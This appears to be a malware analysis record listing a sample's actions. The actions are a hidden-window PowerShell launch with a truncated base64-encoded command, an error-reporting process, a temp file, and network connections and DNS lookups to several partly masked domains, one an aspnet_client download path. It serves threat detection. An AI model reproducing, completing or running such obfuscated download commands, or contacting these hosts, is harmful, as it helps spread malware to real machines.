Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGUAdQB2AHMAZQBpAG0AdgB1AGEAbgBmAG8AZQBzAHkAbwBsAD0AJwBjAGgAaQBlAHkAbgB1AHUAdwByAGUAZQBsAG0AYQBpAGgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1968
- %TEMP%\814684.cvr
- 'bs##000.com':80
- 'ba###boom.com':80
- 'co######ptingbangkok.clinic':443
- 'vi##.com':443
- http://bs##000.com/aspnet_client/bw/
- 'co######ptingbangkok.clinic':443
- 'vi##.com':443
- DNS ASK bs##000.com
- DNS ASK ba###boom.com
- DNS ASK co######ptingbangkok.clinic
- DNS ASK vi##.com
- DNS ASK ko######-sarzamin-man.ir
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGUAdQB2AHMAZQBpAG0AdgB1AGEAbgBmAG8AZQBzAHkAbwBsAD0AJwBjAGgAaQBlAHkAbgB1AHUAdwByAGUAZQBsAG0AYQBpAGgAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAG...' (with hidden window)